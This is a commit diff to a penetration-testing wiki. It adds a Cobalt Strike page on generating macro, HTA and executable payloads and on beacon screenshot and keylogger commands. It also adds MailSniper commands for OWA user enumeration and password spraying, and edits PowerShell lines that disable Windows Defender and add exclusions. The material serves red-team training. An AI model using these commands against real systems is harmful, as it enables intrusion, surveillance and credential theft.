GitBook: [#3365] No subject

This commit is contained in:
CPol 2022-08-12 22:50:15 +00:00 committed by gitbook-bot
parent cbff1b34ea
commit b60731d690
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 69 additions and 6 deletions

View file

@ -639,6 +639,7 @@
* [Empire](backdoors/empire.md)
* [Salseo](backdoors/salseo.md)
* [ICMPsh](backdoors/icmpsh.md)
* [Cobalt Strike](c2/cobalt-strike.md)
## ✍ TODO

42
c2/cobalt-strike.md Normal file
View file

@ -0,0 +1,42 @@
# Cobalt Strike
### Listeners
Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
### Generate & Host payloads
#### Generate payloads in files
Attacks -> Packages -> 
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
* **`Windows Executable`** for a .exe, .dll orr service .exe
* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
#### Generate & Host payloads
A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
#### Host Payloads
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
### Beacon Options
```bash
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of desktop
## Go to View -> Screenshots to see them
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
```

View file

@ -91,6 +91,28 @@ msf> use auxiliary/gather/kerberos_enumusers
crackmapexec smb dominio.es -u '' -p '' --users | awk '{print $4}' | uniq
```
{% hint style="warning" %}
You can find lists of usernames in [**this github repo**](https://github.com/danielmiessler/SecLists/tree/master/Usernames/Names).
However, you should have the **name of the people working on the company** from the recon step you should have performed before this. With the name and surname you could used the script [**namemash.py**](https://gist.github.com/superkojiman/11076951) **** to generate potential valid usernames.
{% endhint %}
#### **OWA (Outlook Web Access) Server**
If you found one of these servers in the network you can also perform **user enumeration against it**. For example, you could use the tool [**MailSniper**](https://github.com/dafthack/MailSniper):
```bash
ipmo C:\Tools\MailSniper\MailSniper.ps1
# Get info about the domain
Invoke-DomainHarvestOWA -ExchHostname [ip]
# Enumerate valid users from a list of potential usernames
Invoke-UsernameHarvestOWA -ExchHostname [ip] -Domain [domain] -UserList .\possible-usernames.txt -OutFile valid.txt
# Password spraying
Invoke-PasswordSprayOWA -ExchHostname [ip] -UserList .\valid.txt -Password Summer2021
# Get addresses list from the compromised mail
Get-GlobalAddressList -ExchHostname [ip] -UserName [domain]\[username] -Password Summer2021 -OutFile gal.txt
```
### Knowing one or several usernames
Ok, so you know you have already a valid username but no passwords... Then try:

View file

@ -176,15 +176,13 @@ Get-NetConnectionProfile |
}
```
## Disable Defender
## Antivirus
```bash
#Check status
Get-MpComputerStatus
#Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
#Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
```